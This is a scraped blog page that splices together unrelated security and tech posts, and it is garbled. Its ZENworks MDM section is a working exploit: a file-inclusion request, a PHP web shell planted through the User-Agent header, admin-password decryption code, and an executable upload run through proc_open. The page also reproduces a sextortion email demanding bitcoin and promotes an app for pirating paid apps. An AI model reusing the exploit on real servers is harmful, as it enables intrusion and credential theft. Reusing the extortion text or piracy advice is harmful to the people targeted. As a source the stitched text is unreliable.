Sunday, April 26, 2020

Web Hacking Video Series #4 MySQL Part 2 (Injection And Coding)

Video Lesson Topics:

  1. Setting up your victim application, databases and lab
  2. Attacking a simple injection with information Schema
  3. Automating your injections with python and beautiful soup
  4. Dealing with various web encoding in Python and PHP
  5. Bypassing LoadFile Size restrictions and automating it
  6. Decrypting sensitive data via PHP and Python interactions
  7. As always me rambling about stupid nonsense :P FTW

Part 2 of Mysql covers the topic of injecting a simple SQL injection example. Starts out slow then combines techniques and moves into more advanced topics. Prior to attempting this lesson make sure you have watched the videos in the previous blog or understand both SQL and basic python coding. I will show how to automate the injection process via python utilizing simple HTML processing abilities of beautiful soup.  I will cover many python libraries for encoding data and calling web based applications. I also talk about how to deal with encrypted data and methods of enumerating files and folders looking for possible implementation issues and attack points to decrypt sensitive data via PHP/Python interaction with whats available on the server. This is the 2nd part of a 3 part series on MySQL for attacking web applications.

Files Needed:
Lab Files
BT5

Video Lesson:

Whats Next:
PHP source code analysis
Recoding PHP applications to fix SQLi

More articles


Lulzbuster - A Very Fast And Smart Web Directory And File Enumeration Tool Written In C


Lulzbuster is a very fast and smart web directory and file enumeration tool written in C.

Usage
$ lulzbuster -H
__ __ __ __
/ /_ __/ /___ / /_ __ _______/ /____ _____
/ / / / / /_ / / __ \/ / / / ___/ __/ _ \/ ___/
/ / /_/ / / / /_/ /_/ / /_/ (__ ) /_/ __/ /
/_/\__,_/_/ /___/_.___/\__,_/____/\__/\___/_/

--==[ by nullsecurity.net ] ==--

usage

lulzbuster -s <arg> [opts] | <misc>

target options

-s <url> - start url to begin scan with

http options

-h <type> - http request type (default: GET) - ? to list types
-x <code> - exclude http status codes (default: 400,404,500,501,502,503
multi codes separated by ',')
-f - follow http redirects. hint: better try appending a '/'
with '-A' option first instead of using '-f'
-F <num> - num level to follow http redirects (default: 0)
-u <str> - use r-agent string (default: built-in windows firefox)
-U - use random built-in user-agents
-c <str> - pass custom header(s) (e.g. 'Cookie: foo=bar; lol=lulz')
-a <creds> - http auth credentials (format: <user>:<pass>)
-r - turn on auto update referrer
-j <num> - define http version (default: curl's default) - ? to list

timeout options

-D <num> - num seconds for delay between requests (default: 0)
-C <num> - num seconds for connect timeout (default: 10)
-R <num> - num seconds for request timeout (default: 30)
-T <num> - num seconds to give up and exit lulzbuster completely
(default: none)

tuning options

-t <num> - num threads for concurrent scanning (default: 30)
-g <num> - num connection cache size for curl (default: 30)
note: this value should always equal to -t's value

other options

-w <file> - wordlist file
(default: /usr/local/share/lulzbuster/lists/medium.txt)
-A <str> - append any words separated by comma (e.g. '/,.php,~bak)
-p <addr> - proxy address (format: <scheme>://<host>:<port>) - ? to
list supported schemes
-P <creds> - proxy auth credentials (format: <user>:<pass>)
-i - insecure mode (skips ssl/tls cert verification)
-S - smart mode aka eliminate false-positives, more infos,
et c. (use this if speed is not your 1st priority!)
-n <str> - nameservers (default: '1.1.1.1,8.8.8.8,208.67.222.222'
multi separated by '.')
-l <file> - log found paths and valid urls to file

misc

-X - print built-in user-agents
-V - print version of lulzbuster and exit
-H - print this help and exit

Author
noptrix

Notes
  • clean code; real project
  • lulzbuster is already packaged and available for BlackArch Linux
  • My master-branches are always stable; dev-branches are created for current work.
  • All of my public stuff you find are officially announced and published via nullsecurity.net.

Disclaimer
We hereby emphasize, that the hacking related stuff found on nullsecurity.net are only for education purposes. We are not responsible for any damages. You are responsible for your own actions.




via KitPloit

Continue reading


Saturday, April 25, 2020

DOWNLOAD BLACKMART ANDROID APP – DOWNLOAD PLAYSTORE PAID APPS FREE

Android made endless possibilities for everyone. It introduced a platform where are millions of apps that a user can download and buy depending on their needs. You're thinking about Google PlayStore, yes I am also talking about Google PlayStore. It's categorized app collection depending on every niche of life. Few of them are free and some of them are paid. Most of the paid apps are only charges small cost in between $2 to $8, but few apps are highly costly that make cost over $50 even, which is not possible for every user to buy and get benefit from it. So, here I am sharing a really useful app, that can make every Google PlayStore app for you to download it for free. You can download any paid app that may even cost about $50. It's totally free. Download blackmart Android app and download google play store paid apps freely.

DOWNLOAD BLACKMART ANDROID APP – DOWNLOAD PLAYSTORE PAID APPS FREE

  • It's extremely easy to use.
  • It has a Multilingual option for a global user experience.
  • The app doesn't ask for any payments.
  • Capable to download full of downloadable applications.
  • Super fast in downloading and installation.

More information


BurpSuite Introduction & Installation



What is BurpSuite?
Burp Suite is a Java based Web Penetration Testing framework. It has become an industry standard suite of tools used by information security professionals. Burp Suite helps you identify vulnerabilities and verify attack vectors that are affecting web applications. Because of its popularity and breadth as well as depth of features, we have created this useful page as a collection of Burp Suite knowledge and information.

In its simplest form, Burp Suite can be classified as an Interception Proxy. While browsing their target application, a penetration tester can configure their internet browser to route traffic through the Burp Suite proxy server. Burp Suite then acts as a (sort of) Man In The Middle by capturing and analyzing each request to and from the target web application so that they can be analyzed.











Everyone has their favorite security tools, but when it comes to mobile and web applications I've always found myself looking BurpSuite . It always seems to have everything I need and for folks just getting started with web application testing it can be a challenge putting all of the pieces together. I'm just going to go through the installation to paint a good picture of how to get it up quickly.

BurpSuite is freely available with everything you need to get started and when you're ready to cut the leash, the professional version has some handy tools that can make the whole process a little bit easier. I'll also go through how to install FoxyProxy which makes it much easier to change your proxy setup, but we'll get into that a little later.

Requirements and assumptions:

Mozilla Firefox 3.1 or Later Knowledge of Firefox Add-ons and installation The Java Runtime Environment installed

Download BurpSuite from http://portswigger.net/burp/download.htmland make a note of where you save it.

on for Firefox from   https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/


If this is your first time running the JAR file, it may take a minute or two to load, so be patient and wait.


Video for setup and installation.




You need to install compatible version of java , So that you can run BurpSuite.

More info


DeepEnd Research: Analysis Of Trump's Secret Server Story


 We posted our take on the Trump's server story. If you have any feedback or corrections, send me an email (see my blog profile on Contagio or DeepEnd Research)

Analysis of Trump's secret server story...



Continue reading


Chapter 1To 5 HTML

Contents

 
About
 
................................................................................................................................................................................... 1
 
Chapter 1: Getting started with HTML
 
................................................................................................................ 2
 
Section 1.1: Hello World 2
 
Chapter 2: Doctypes
 
.................................................................................................................................................... 4
 
Section 2.1: Adding the Doctype 4
Section 2.2: HTML 5 Doctype 4
 
Chapter 3: Headings
 
.................................................................................................................................................... 5
 
Section 3.1: Using Headings 5
 
Chapter 4: Paragraphs
 
.............................................................................................................................................. 6
 
Section 4.1: HTML Paragraphs
Chapter 5: Text Formatting
 
.....................................................................................................................................  6
.....................................................................................................................................  7
 
Section 5.1: Highlighting 7
Section 5.2: Bold, Italic, and Underline 7
Section 5.3: Abbreviation 8
Section 5.4: Inserted, Deleted, or Stricken 8
Section 5.5: Superscript and Subscript 8
 
Chapter 1: Getting started with HTML

Version Specification Release Date
1.0 N/A 1994-01-01
2.0 RFC 1866
1995-11-24
3.2 W3C: HTML 3.2 Specification
1997-01-14
4.0 W3C: HTML 4.0 Specification
1998-04-24
4.01 W3C: HTML 4.01 Specification
1999-12-24
5 WHATWG: HTML Living Standard
2014-10-28
5.1 W3C: HTML 5.1 Specification
2016-11-01
Section 1.1: Hello World
Introduction

HTML (Hypertext Markup Language) uses a markup system composed of elements which represent specific content. Markup means that with HTML you declare what is presented to a viewer, not how it is presented. Visual representations are defined by Cascading Style Sheets (CSS) and realized by browsers. Still existing elements that allow for such, like e.g. font, "are entirely obsolete, and must not be used by authors"[1].
HTML is sometimes called a programming language but it has no logic, so is a markup language. HTML tags provide semantic meaning and machine-readability to the content in the page.
An element usually consists of an opening tag (<element_name>), a closing tag (</element_name>), which contain the element's name surrounded by angle brackets, and the content in between:
<element_name>...content...</element_name>

There are some HTML elements that don't have a closing tag or any contents. These are called void elements. Void elements include <img>, <meta>, <link> and <input>.
Element names can be thought of as descriptive keywords for the content they contain, such as video, audio, table, footer.
A HTML page may consist of potentially hundreds of elements which are then read by a web browser, interpreted and rendered into human readable or audible content on the screen.
For this document it is important to note the difference between elements and tags:

Elements: video, audio, table, footer

Tags: <video>, <audio>, <table>, <footer>, </html>, </body>


Element insight

Let's break down a tag...

The <p> tag represents a common paragraph.

Elements commonly have an opening tag and a closing tag. The opening tag contains the element's name in angle brackets (<p>). The closing tag is identical to the opening tag with the addition of a forward slash (/) between the opening bracket and the element's name (</p>).
Content can then go between these two tags: <p>This is a simple paragraph.</p>.
 
Creating a simple page

The following HTML example creates a simple "Hello World" web page.

HTML files can be created using any text editor. The files must be saved with a .html or .htm[2] extension in order to be recognized as HTML files.

Once created, this file can be opened in any web browser.




Simple page break down

These are the tags used in the example:

Tag Meaning
<!DOCTYPE> Defines the HTML version used in the document. In this case it is HTML5.
See the doctypes topic for more information.
Opens the page. No markup should come after the closing tag (</html>). The lang attribute declares
 
<html>


<head>



<meta>
 
the primary language of the page using the ISO language codes (en for English). See the Content Language topic for more information.
Opens the head section, which does not appear in the main browser window but mainly contains information about the HTML document, called metadata. It can also contain imports from external stylesheets and scripts. The closing tag is </head>.
Gives the browser some metadata about the document. The charset attribute declares the character encoding. Modern HTML documents should always use UTF-8, even though it is not a requirement. In HTML, the <meta> tag does not require a closing tag.
See the Meta topic for more information.
 
<title> The title of the page. Text written between this opening and the closing tag (</title>) will be displayed on the tab of the page or in the title bar of the browser.
<body> Opens the part of the document displayed to users, i.e. all the visible or audible content of a page. No content should be added after the closing tag </body>.
<h1> A level 1 heading for the page.
See headings for more information.
<p> Represents a common paragraph of text.

1. ↑ HTML5, 11.2 Non-conforming features
2. ↑ .htm is inherited from the legacy DOS three character file extension limit.
 
Chapter 2: Doctypes

Doctypes - short for 'document type' - help browsers to understand the version of HTML the document is written in for better interpretability. Doctype declarations are not HTML tags and belong at the very top of a document. This topic explains the structure and declaration of various doctypes in HTML.
Section 2.1: Adding the Doctype
The <!DOCTYPE> declaration should always be included at the top of the HTML document, before the <html> tag.

Version ≥ 5

See HTML 5 Doctype for details on the HTML 5 Doctype.


Section 2.2: HTML 5 Doctype
HTML5 is not based on SGML (Standard Generalized Markup Language), and therefore does not require a reference to a DTD (Document Type Definition).
HTML 5 Doctype declaration:

Case Insensitivity

Per the W3.org HTML 5 DOCTYPE Spec:

A DOCTYPE must consist of the following components, in this order:

1. A string that is an ASCII case-insensitive match for the string "<!DOCTYPE".

therefore the following DOCTYPEs are also valid:


This SO article discusses the topic extensively: Uppercase or lowercase doctype?
 
Chapter 3: Headings

HTML provides not only plain paragraph tags, but six separate header tags to indicate headings of various sizes and thicknesses. Enumerated as heading 1 through heading 6, heading 1 has the largest and thickest text while heading 6 is the smallest and thinnest, down to the paragraph level. This topic details proper usage of these tags.
Section 3.1: Using Headings
Headings can be used to describe the topic they precede and they are defined with the <h1> to <h6> tags. Headings support all the global attributes.

<h1> defines the most important heading.
<h6> defines the least important heading.

Defining a heading:

Correct structure matters

Search engines and other user agents usually index page content based on heading elements, for example to create a table of contents, so using the correct structure for headings is important.
In general, an article should have one h1 element for the main title followed by h2 subtitles – going down a layer if necessary. If there are h1 elements on a higher level they shoudn't be used to describe any lower level content.

Example document (extra intendation to illustrate hierarchy):

 
Chapter 4: Paragraphs

Column Column
<p> Defines a paragraph
<br> Inserts a single line break
<pre> Defines pre-formatted text

Paragraphs are the most basic HTML element. This topic explains and demonstrates the usage of the paragraph element in HTML.

Section 4.1: HTML Paragraphs

The HTML <p> element defines a paragraph:


Display-

You cannot be sure how HTML will be displayed.

Large or small screens, and resized windows will create different results.

With HTML, you cannot change the output by adding extra spaces or extra lines in your HTML code. The browser will remove any extra spaces and extra lines when the page is displayed:
 
Chapter 5: Text Formatting

While most HTML tags are used to create elements, HTML also provides in-text formatting tags to apply specific text-related styles to portions of text. This topic includes examples of HTML text formatting such as highlighting, bolding, underlining, subscript, and stricken text

Section 5.1: Highlighting

The <mark> element is new in HTML5 and is used to mark or highlight text in a document "due to its relevance in another context".1

The most common example would be in the results of a search were the user has entered a search query and results are shown highlighting the desired query.


Output:


A common standard formatting is black text on a yellow background, but this can be changed with CSS.

Section 5.2: Bold, Italic, and Underline
Bold Text

To bold text, use the <strong> or <b> tags:


or


What's the difference? Semantics. <strong> is used to indicate that the text is fundamentally or semantically important to the surrounding text, while <b> indicates no such importance and simply represents text that should be bolded.

If you were to use <b> a text-to-speech program would not say the word(s) any differently than any of the other words around it - you are simply drawing attention to them without adding any additional importance. By using
<strong>, though, the same program would want to speak those word(s) with a different tone of voice to convey that the text is important in some way.

Italic Text

To italicize text, use the <em> or <i> tags:

 
or


What's the difference? Semantics. <em> is used to indicate that the text should have extra emphasis that should be stressed, while <i> simply represents text which should be set off from the normal text around it.

For example, if you wanted to stress the action inside a sentence, one might do so by emphasizing it in italics via
<em>: "Would you just submit the edit already?"

But if you were identifying a book or newspaper that you would normally italicize stylistically, you would simply use
<i>: "I was forced to read Romeo and Juliet in high school.

Underlined Text

While the <u> element itself was deprecated in HTMl 4, it was reintroduced with alternate semantic meaning in HTML 5 - to represent an unarticulated, non-textual annotation. You might use such a rendering to indicate misspelled text on the page, or for a Chinese proper name mark.


Section 5.3: Abbreviation

To mark some expression as an abbreviation, use <abbr> tag:


If present, the title attribute is used to present the full description of such abbreviation.

Section 5.4: Inserted, Deleted, or Stricken

To mark text as inserted, use the <ins> tag:


To mark text as deleted, use the <del> tag:


To strike through text, use the <s> tag:


Section 5.5: Superscript and Subscript

To offset text either upward or downward you can use the tags <sup> and <sub>. To create superscript:
 

To create subscript:
 
@EVERYTHINGNT
More info

Novell Zenworks MDM: Mobile Device Management For The Masses

I'm pretty sure the reason Novell titled their Mobile Device Management (MDM, yo) under the 'Zenworks' group is because the developers of the product HAD to be in a state of meditation (sleeping) when they were writing the code you will see below.


For some reason the other night I ended up on the Vupen website and saw the following advisory on their page:
Novell ZENworks Mobile Management LFI Remote Code Execution (CVE-2013-1081) [BA+Code]
I took a quick look around and didn't see a public exploit anywhere so after discovering that Novell provides 60 day demos of products, I took a shot at figuring out the bug.
The actual CVE details are as follows:
"Directory traversal vulnerability in MDM.php in Novell ZENworks Mobile Management (ZMM) 2.6.1 and 2.7.0 allows remote attackers to include and execute arbitrary local files via the language parameter."
After setting up a VM (Zenworks MDM 2.6.0) and getting the product installed it looked pretty obvious right away ( 1 request?) where the bug may exist:
POST /DUSAP.php HTTP/1.1
Host: 192.168.20.133
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.20.133/index.php
Cookie: PHPSESSID=3v5ldq72nvdhsekb2f7gf31p84
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 74

username=&password=&domain=&language=res%2Flanguages%2FEnglish.php&submit=
Pulling up the source for the "DUSAP.php" script the following code path stuck out pretty bad:
<?php
session_start();

$UserName = $_REQUEST['username'];
$Domain = $_REQUEST['domain'];
$Password = $_REQUEST['password'];
$Language = $_REQUEST['language'];
$DeviceID = '';

if ($Language !== ''  &&  $Language != $_SESSION["language"])
{
     //check for validity
     if ((substr($Language, 0, 14) == 'res\\languages\\' || substr($Language, 0, 14) == 'res/languages/') && file_exists($Language))
     {
          $_SESSION["language"] = $Language;
     }
}

if (isset($_SESSION["language"]))
{
     require_once( $_SESSION["language"]);
} else
{
     require_once( 'res\languages\English.php' );
}

$_SESSION['$DeviceSAKey'] = mdm_AuthenticateUser($UserName, $Domain, $Password, $DeviceID);
In English:

  • Check if the "language" parameter is passed in on the request
  • If the "Language" variable is not empty and if the "language" session value is different from what has been provided, check its value
  • The "validation" routine checks that the "Language" variable starts with "res\languages\" or "res/languages/" and then if the file actually exists in the system
  • If the user has provided a value that meets the above criteria, the session variable "language" is set to the user provided value
  • If the session variable "language" is set, include it into the page
  • Authenticate

So it is possible to include any file from the system as long as the provided path starts with "res/languages" and the file exists. To start off it looked like maybe the IIS log files could be a possible candidate to include, but they are not readable by the user everything is executing under…bummer. The next spot I started looking for was if there was any other session data that could be controlled to include PHP. Example session file at this point looks like this:
$error|s:12:"Login Failed";language|s:25:"res/languages/English.php";$DeviceSAKey|i:0;
The "$error" value is server controlled, the "language" has to be a valid file on the system (cant stuff PHP in it), and "$DeviceSAKey" appears to be related to authentication. Next step I started searching through the code for spots where the "$_SESSION" is manipulated hoping to find some session variables that get set outside of logging in. I ran the following to get a better idea of places to start looking:
egrep -R '\$_SESSION\[.*\] =' ./
This pulled up a ton of results, including the following:
 /desktop/download.php:$_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT'];
 Taking a look at the "download.php" file the following was observed:

<?php
session_start();
if (isset($_SESSION["language"]))
{
     require_once( $_SESSION["language"]);
} else
{
     require_once( 'res\languages\English.php' );
}
$filedata = $_SESSION['filedata'];
$filename = $_SESSION['filename'];
$usersakey = $_SESSION['UserSAKey'];

$_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT'];
$active_user_agent = strtolower($_SESSION['user_agent']);

$ext = substr(strrchr($filename, '.'), 1);

if (isset($_SESSION['$DeviceSAKey']) && $_SESSION['$DeviceSAKey']  > 0)
{

} else
{
     $_SESSION['$error'] = LOGIN_FAILED_TEXT;
     header('Location: index.php');

}
The first highlighted part sets a new session variable "user_agent" to whatever our browser is sending, good so far.... The next highlighted section checks our session for "DeviceSAKey" which is used to check that the requester is authenticated in the system, in this case we are not so this fails and we are redirected to the login page ("index.php"). Because the server stores our session value before checking authentication (whoops) we can use this to store our payload to be included :)


This will create a session file named "sess_payload" that we can include, the file contains the following:
 user_agent|s:34:"<?php echo(eval($_GET['cmd'])); ?>";$error|s:12:"Login Failed";
 Now, I'm sure if you are paying attention you'd say "wait, why don't you just use exec/passthru/system", well the application installs and configures IIS to use a "guest" account for executing everything – no execute permissions for system stuff (cmd.exe,etc) :(. It is possible to get around this and gain system execution, but I decided to first see what other options are available. Looking at the database, the administrator credentials are "encrypted", but I kept seeing a function being used in PHP when trying to figure out how they were "encrypted": mdm_DecryptData(). No password or anything is provided when calling the fuction, so it can be assumed it is magic:
return mdm_DecryptData($result[0]['Password']); 
Ends up it is magic – so I sent the following PHP to be executed on the server -
$pass=mdm_ExecuteSQLQuery("SELECT Password FROM Administrators where AdministratorSAKey = 1",array(),false,-1,"","","",QUERY_TYPE_SELECT);
echo $pass[0]["UserName"].":".mdm_DecryptData($pass[0]["Password"]);
 


Now that the password is available, you can log into the admin panel and do wonderful things like deploy policy to mobile devices (CA + proxy settings :)), wipe devices, pull text messages, etc….

This functionality has been wrapped up into a metasploit module that is available on github:

Next up is bypassing the fact we cannot use "exec/system/passthru/etc" to execute system commands. The issue is that all of these commands try and execute whatever is sent via the system "shell", in this case "cmd.exe" which we do not have rights to execute. Lucky for us PHP provides "proc_open", specifically the fact "proc_open" allows us to set the "bypass_shell" option. So knowing this we need to figure out how to get an executable on the server and where we can put it. The where part is easy, the PHP process user has to be able to write to the PHP "temp" directory to write session files, so that is obvious. There are plenty of ways to get a file on the server using PHP, but I chose to use "php://input" with the executable base64'd in the POST body:
$wdir=getcwd()."\..\..\php\\\\temp\\\\";
file_put_contents($wdir."cmd.exe",base64_decode(file_get_contents("php://input")));
This bit of PHP will read the HTTP post's body (php://input) , base64 decode its contents, and write it to a file in a location we have specified. This location is relative to where we are executing so it should work no matter what directory the product is installed to.


After we have uploaded the file we can then carry out another request to execute what has been uploaded:
$wdir=getcwd()."\..\..\php\\\\temp\\\\";
$cmd=$wdir."cmd.exe";
$output=array();
$handle=proc_open($cmd,array(1=>array("pipe","w")),$pipes,null,null,array("bypass_shell"=>true));
if(is_resource($handle))
{
     $output=explode("\\n",+stream_get_contents($pipes[1]));
     fclose($pipes[1]);
     proc_close($handle);
}
foreach($output+as &$temp){echo+$temp."\\r\\n";};
The key here is the "bypass_shell" option that is passed to "proc_open". Since all files that are created by the process user in the PHP "temp" directory are created with "all of the things" permissions, we can point "proc_open" at the file we have uploaded and it will run :)

This process was then rolled up into a metasploit module which is available here:


Update: Metasploit modules are now available as part of metasploit.

Related posts

Thursday, April 23, 2020

Linux Command Line Hackery Series - Part 5



Welcome back to the Linux Command Line Hackery series, this is Part-V of the series. Today we are going to learn how to monitor and control processes on our Linux box, so wrap your sleeves up and let's get started.

Command:    ps
Syntax:           ps [options]
Description:  ps displays information about the currently running processes. Some of the common flags of ps are described briefly below
Flags: 
  -A or -e -> select all processes
  -a -> select all processes except both session leaders and processes not associated with a terminal.
  T -> select all processes associated with current terminal
  -u <username or id> -> select all processes of a given user or userlist

Open up a terminal and type ps:

ps

what you'll see is a list of processes currently running in your terminal. One important thing to notice in the output is what's called as PID which stands for process ID. It is the number that uniquely identifies a process. Just keep that PID concept in mind we'll use it soon.

OK I know that's not really what you want to see rather you want to see all the processes that are currently running on your box. Don't worry we have flags to rescue, in order to see all the processes you can use the -e flag like this:

ps -e

Boom! you get a long list of processes currently running on your machine (don't stare at me like that, you asked and I gave you that). If you want to see processes of a particular user you can type the following command in your terminal:

ps -u bob

here "bob" is a username. This command will list all processes of the user with effective user name of bob.

You can do a full-format listing of the processes using the -f flag like this:

ps -fu bob

But the output of the ps command is a snapshot not really a live preview of what is going on in your box. I know your next question is going to be something like this, Isn't there a command in Linux that gives me a live updating information of the processes? Yes, there is a command called top that we'll learn about next.

Command:    top
Syntax:           top [options]
Description:  top gives a dynamic real-time view of a running system. That is, it gives the up-to-date information about all the processes running on your Linux box (sounds fun!). Besides giving information about current processes and threads top also provides a brief system summary.

To start top just type this command:

top

and you'll get a nice and cute looking ugly display :). Well what the heck is going on here you might ask, right? What you get is information about what is going on with your computer. To see what more can you do with top just type <h> within the program window and you'll be given list of options that you can play with.

OK looking at what processes are going on in your box is cool but what if you want to terminate (or close) a process, is there a command line utility for that? Yes, there is and that's what we are going to look at next.

Command:   kill
Syntax:          kill [options] <pid> [...]
Description:  kill is used to send a signal to process which by default is a TERM signal meaning kill by default sends a signal of termination to process (Cruel guy). To list the available signals we can use the -l or -L flag of the kill command.


To simply terminate a process we provide kill command a PID (process ID) and it will send the TERM signal to the process. So to kill a process first we'll list the running processes and then we'll keep the PID of the process in mind that we want to terminate. After that we'll issue the kill command with the PID that we just found.

ps -ax
kill 1153

the above command will send a TERM signal to the process whose PID is 1153, as simple as that.

We can also use our already learned skills to refine the output of ps command. Say we have a xterm terminal running on our box and we want to terminate it. By using ps command all alone we'll get a long listing of all processes running on our box. But we can limit the output of ps command to just those processes that we're interested in by piping ps command with the grep command like this:

ps -ax | grep xterm

wow! that's amazing, we're able to pull out only those results from the ps command that contained xterm in them. Isn't that a cool trick? But what is that vertical bar ( ) doing in the middle, you may be thinking, right? Remember we learned about the input and output re-directors previously, the vertical bar (pipe in geeky terms) is another re-director whose task is to redirect the output of one command as input to another command. Here the pipe redirects the output of ps -ax command as input to grep command and of-course from the previous article you know that grep is used to search for a PATTERN in the given input. That means the above command searches for the xterm word in the output of ps -ax command and then displays just those lines of ps -ax command which contain xterm. Now get that PID and kill that process.

That's it for today, try these commands up on your own box and remember practice is gonna make you master the Linux command line. :)

Related news

  1. Hacking Games
  2. Google Hacking
  3. Herramientas Hacking Etico
  4. Herramientas Hacking
  5. Hacking Etico
  6. Significado De Hacker
  7. Hacking Etico Libro
  8. Viral Hacking
  9. Whatsapp Hacking
  10. Curso Hacking Etico
  11. Que Es Un Hacker

Wednesday, April 22, 2020

H¡gh level of r¡sk. Your account has been hacked. Change yøur passwørd.

Hellø!

I am a hacker whø has access tø yøur øperat¡ng system.
I alsø have full access tø yøur accøuňt.

I've been watch¡ng yøu før a few mønths nøw.
The fact ¡s that yøu were ¡nfected w¡th malware thrøugh an adult s¡te that yøu v¡s¡ted.

If yøu are nøt fam¡l¡ar w¡th th¡s, ¡ w¡ll expla¡n.
Trøjan V¡rus g¡ves me full access and cøntrøl øver a cømputer ør øther dev¡ce.
Th¡s means that ¡ can see everyth¡ng øn yøur screen, turn øn the camera and m¡crøphøne, but yøu dø nøt knøw abøut ¡t.

I alsø have access tø all yøur cøntacts and
all yøur cørrespøndence.
Why yøur ant¡v¡rus d¡d nøt detect malware?
Answer: My malware uses the dr¡ver, ¡ update ¡ts s¡gnatures every 4 høurs sø that yøur ant¡v¡rus ¡s s¡lent.

I made a v¡deø shøw¡ng høw yøu masturbate øn the left half øf the screen, and ¡n the r¡ght half yøu see the v¡deø that yøu watched. W¡th øne cl¡ck øf the møuse,
I can send th¡s v¡deø tø all yøur ema¡ls and cøntacts øn søc¡al netwørks. ¡ can alsø pøst access tø all yøur e-ma¡l cørrespøndence and messengers that yøu use.

If yøu want tø prevent th¡s, transfer the amøunt øf $1200(USD) tø my b¡tcø¡n address (¡f yøu dø nøt knøw høw tø dø th¡s, wr¡te tø Gøøgle: 'Buy BTC').

My b¡tcø¡n address (BTC Wallet) ¡s: 16QLrb5Ej3VLCaxeivbJxAgfvWEXyqGAfc

After rece¡v¡ng the payment, ¡ w¡ll delete the v¡deø and yøu w¡ll never hear me aga¡n.
I g¡ve yøu 48 høurs tø pay.
I have a nøt¡ce read¡ng th¡s letter, and the t¡mer w¡ll wørk when yøu see th¡s letter.
F¡l¡ng a cømpla¡nt sømewhere døes nøt make sense because th¡s ema¡l cannøt be tracked l¡ke my b¡tcø¡n address.
I dø nøt make any m¡stakes.

If ¡ f¡nd that yøu have shared th¡s message w¡th sømeøne else, the v¡deø w¡ll be ¡mmed¡ately d¡str¡buted.

Best regards!

BurpSuite Introduction & Installation



What is BurpSuite?
Burp Suite is a Java based Web Penetration Testing framework. It has become an industry standard suite of tools used by information security professionals. Burp Suite helps you identify vulnerabilities and verify attack vectors that are affecting web applications. Because of its popularity and breadth as well as depth of features, we have created this useful page as a collection of Burp Suite knowledge and information.

In its simplest form, Burp Suite can be classified as an Interception Proxy. While browsing their target application, a penetration tester can configure their internet browser to route traffic through the Burp Suite proxy server. Burp Suite then acts as a (sort of) Man In The Middle by capturing and analyzing each request to and from the target web application so that they can be analyzed.











Everyone has their favorite security tools, but when it comes to mobile and web applications I've always found myself looking BurpSuite . It always seems to have everything I need and for folks just getting started with web application testing it can be a challenge putting all of the pieces together. I'm just going to go through the installation to paint a good picture of how to get it up quickly.

BurpSuite is freely available with everything you need to get started and when you're ready to cut the leash, the professional version has some handy tools that can make the whole process a little bit easier. I'll also go through how to install FoxyProxy which makes it much easier to change your proxy setup, but we'll get into that a little later.

Requirements and assumptions:

Mozilla Firefox 3.1 or Later Knowledge of Firefox Add-ons and installation The Java Runtime Environment installed

Download BurpSuite from http://portswigger.net/burp/download.htmland make a note of where you save it.

on for Firefox from   https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/


If this is your first time running the JAR file, it may take a minute or two to load, so be patient and wait.


Video for setup and installation.




You need to install compatible version of java , So that you can run BurpSuite.
More articles

Sslmerge - Tool To Help You Build A Valid SSL Certificate Chain From The Root Certificate To The End-User Certificate


Is an open source tool to help you build a valid SSL certificate chain from the root certificate to the end-user certificate. Also can help you fix the incomplete certificate chain and download all missing CA certificates.

How To Use
It's simple:
# Clone this repository
git clone https://github.com/trimstray/sslmerge

# Go into the repository
cd sslmerge

# Install
./setup.sh install

# Run the app
sslmerge -i /data/certs -o /data/certs/chain.crt
  • symlink to bin/sslmerge is placed in /usr/local/bin
  • man page is placed in /usr/local/man/man8

Parameters
Provides the following options:
  Usage:
sslmerge <option|long-option>

Examples:
sslmerge --in Root.crt --in Intermediate1.crt --in Server.crt --out bundle_chain_certs.crt
sslmerge --in /tmp/certs --out bundle_chain_certs.crt --with-root
sslmerge -i Server.crt -o bundle_chain_certs.crt

Options:
--help show this message
--debug displays information on the screen (debug mode)
-i, --in add certificates to merge (certificate file, multiple files or directory with ssl certificates)
-o, --out saves the result (chain) to file
--with-root add root certificate to the certificate chain

How it works
Let's start with ssllabs certificate chain. They are delivered together with the sslmerge and can be found in the example/ssllabs.com directory which additionally contains the all directory (containing all the certificates needed to assemble the chain) and the server_certificate directory (containing only the server certificate).
The correct chain for the ssllabs.com domain (the result of the openssl command):
Certificate chain
0 s:/C=US/ST=California/L=Redwood City/O=Qualys, Inc./CN=ssllabs.com
i:/C=US/O=Entrust, Inc./OU=See www.entrust.net/legal-terms/OU=(c) 2012 Entrust, Inc. - for authorized use only/CN=Entrust Certification Authority - L1K
1 s:/C=US/O=Entrust, Inc./OU=See www.entrust.net/legal-terms/OU=(c) 2012 Entrust, Inc. - for authorized use only/CN=Entrust Certification Authority - L1K
i:/C=US/O=Entrust, Inc./OU=See www.entrust.net/legal-terms/OU=(c) 2009 Entrust, Inc. - for authorized use only/CN=Entrust Root Certification Authority - G2
2 s:/C=US/O=Entrust, Inc./OU=See www.entrust.net/legal-terms/OU=(c) 2009 Entrust, Inc. - for authorized use only/CN=Entrust Root Certification Authority - G2
i:/C=US/O=Entrust, Inc./OU=www.entrust.net/CPS is incorporated by reference/OU=(c) 2006 Entrust, Inc./CN=Entrust Root Certification Authority
The above code presents a full chain consisting of:
  • Identity Certificate (Server Certificate)
    issued for ssllabs.com by Entrust Certification Authority - L1K
  • Intermediate Certificate
    issued for Entrust Certification Authority - L1K by Entrust Root Certification Authority - G2
  • Intermediate Certificate
    issued for Entrust Root Certification Authority - G2 by Entrust Root Certification Authority
  • Root Certificate (Self-Signed Certificate)
    issued for Entrust Root Certification Authority by Entrust Root Certification Authority

Scenario 1
In this scenario, we will chain all delivered certificates. Example of running the tool:

Scenario 2
In this scenario, we only use the server certificate and use it to retrieve the remaining required certificates. Then, as above, we will combine all the provided certificates. Example of running the tool:

Certificate chain
In order to create a valid chain, you must provide the tool with all the necessary certificates. It will be:
  • Server Certificate
  • Intermediate CAs and Root CAs
This is very important because without it you will not be able to determine the beginning and end of the chain.
However, if you look inside the generated chain after generating with sslmerge, you will not find the root certificate there. Why?
